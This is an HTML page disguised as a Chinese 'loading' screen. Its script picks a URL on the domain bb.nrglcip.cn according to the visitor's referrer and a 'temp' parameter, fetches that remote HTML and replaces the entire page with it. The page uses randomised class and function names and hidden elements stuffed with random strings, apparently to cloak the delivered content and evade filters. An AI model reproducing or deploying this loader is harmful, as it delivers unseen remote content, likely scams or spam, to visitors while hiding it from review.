<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ee4gVW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ee4gVW .q5dtSQ3shT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ee4gVW .content {
            line-height: 50px;
            text-align: center
        }

        .Ee4gVW .img {
            width: 100%
        }

        .Ee4gVW .R1lhI5 {
            text-align: center
        }

        .Ee4gVW .R1lhI5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ee4gVW .R1lhI5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ee4gVW .R1lhI5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ee4gVW .R1lhI5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ee4gVW .R1lhI5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ee4gVW .R1lhI5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ee4gVW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function e62F7vGhcCs(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aX6DWr = e62F7vGhcCs('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aX6DWr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aX6DWr +".html?a=share";
		}
		
        RUoNMe=url+"#"+new Date().getTime();
        RUoNMe && function() {
            $.get(RUoNMe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >nrmrx6iFHb6kxJqSD3jem4JZrbrpZoyFuy9ufU3E0kaLtX4</b>
<span style='display:none'>pDdVwvzSRvz4CIiNcdtjkWNAd0GlG5ebiDvUo83uQsPQUY0lNu4ZNLLZR9</span>
<ul style='display:none' >dvMYD368wVUrACQKHJkmcOCwhMZSGFG8SIs</ul>
<span style='display:none'>pDdVwvzSRvz4CIiNcdtjkWNAd0GlG5ebiDvUo83uQsPQUY0lNu4ZNLLZR9</span><div class="Ee4gVW">
    <div class="q5dtSQ3shT">
        <div class="R1lhI5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >WasNJnasnqN6XWzjM</h1>
<li style='display:none' >DqazMax7t15cXzx3QeUfDHVrc6Lw</li>
<span style='display:none'>km1aDnb2qfGK5xcaGZRY1tCAb5DLDUlTRbN</span>
<b style='display:none' >diVxjz8Ce4GGhF0JxCeAV8nMzZZIiB29U1e3H71jm9KKrM2KwbTBiBme1h</b></body>
</html>